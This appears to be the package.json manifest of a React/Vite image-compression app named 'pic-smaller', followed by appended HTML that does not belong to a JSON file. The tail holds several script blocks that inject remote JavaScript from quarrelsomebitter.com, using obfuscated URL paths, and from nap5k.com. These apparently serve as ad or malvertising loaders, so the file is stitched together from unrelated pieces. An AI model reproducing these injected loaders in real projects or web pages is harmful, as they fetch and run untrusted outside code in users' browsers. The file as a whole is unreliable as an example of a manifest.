{
  "name": "pic-smaller",
  "private": true,
  "version": "1.1.0",
  "type": "module",
  "scripts": {
    "dev": "vite",
    "build": "tsc && vite build",
    "build:preview": "tsc && vite build --mode preview",
    "preview": "vite preview",
    "lint": "eslint . --ext ts,tsx --report-unused-disable-directives --max-warnings 0",
    "format": "prettier --write --no-error-on-unmatched-pattern --ignore-unknown src/**/*",
    "test": "vitest run"
  },
  "dependencies": {
    "@ant-design/icons": "^5.3.6",
    "@vercel/analytics": "^1.2.2",
    "antd": "^5.16.4",
    "classnames": "^2.5.1",
    "filesize": "^10.1.1",
    "get-user-locale": "^2.3.2",
    "history": "^5.3.0",
    "jszip": "^3.10.1",
    "mobx": "^6.12.3",
    "mobx-react-lite": "^4.0.7",
    "react": "^18.2.0",
    "react-dom": "^18.2.0",
    "react-responsive": "^10.0.0",
    "sprintf-js": "^1.1.3",
    "svgo": "^3.3.2"
  },
  "devDependencies": {
    "@types/lodash": "^4.17.0",
    "@types/node": "^20.12.7",
    "@types/react": "^18.2.66",
    "@types/react-dom": "^18.2.22",
    "@types/sprintf-js": "^1.1.4",
    "@typescript-eslint/eslint-plugin": "^7.2.0",
    "@typescript-eslint/parser": "^7.2.0",
    "@vitejs/plugin-react": "^4.2.1",
    "eslint": "^8.57.0",
    "eslint-plugin-react-hooks": "^4.6.0",
    "eslint-plugin-react-refresh": "^0.4.6",
    "prettier": "^3.2.5",
    "sass": "^1.75.0",
    "typescript": "^5.2.2",
    "vconsole": "^3.15.1",
    "vite": "^5.2.0",
    "vitest": "^1.6.0"
  }
}
<meta name="referrer" content="no-referrer-when-downgrade" />
<script>
(function(amd){
var d = document,
s = d.createElement('script'),
l = d.scripts[d.scripts.length - 1];
s.settings = amd || {};
s.src = "\/\/quarrelsomebitter.com\/bvX.Vis\/dbGtly0oYZWacS\/BeFmv9oufZhUNlxkxPQTgczw\/MUzQY\/y\/MtTkcZtWNjzWAyz\/NfjdIhyNM\/QR";
s.async = true;
s.referrerPolicy = 'no-referrer-when-downgrade';
l.parentNode.insertBefore(s, l);
})({})
</script>
<script>
(function(amd){
var d = document,
s = d.createElement('script'),
l = d.scripts[d.scripts.length - 1];
s.settings = amd || {};
s.src = "\/\/quarrelsomebitter.com\/bEXyV.sRdiG\/ls0BY\/WHcs\/veLmb9EunZ\/Ullfk\/PHTqcbwbMZzZY\/xTN_DyUSt-NUzwAazTN\/jmEe0fOfQR";
s.async = true;
s.referrerPolicy = 'no-referrer-when-downgrade';
l.parentNode.insertBefore(s, l);
})({})
</script>
<script>(function(s){s.dataset.zone='10993491',s.src='https://nap5k.com/tag.min.js'})([document.documentElement, document.body].filter(Boolean).pop().appendChild(document.createElement('script')))</script>
<script>
(function(elwen){
var d = document,
s = d.createElement('script'),
l = d.scripts[d.scripts.length - 1];
s.settings = elwen || {};
s.src = "\/\/quarrelsomebitter.com\/bSXDVqsJd.GTlM0NYzWNcV\/ke\/m\/9Gu\/ZcUplfkTP\/TzcZwzMHz-YyxXN\/zFM\/tlNWzDAgzNNRjhEW3gNOwF";
s.async = true;
s.referrerPolicy = 'no-referrer-when-downgrade';
l.parentNode.insertBefore(s, l);
})({})
</script>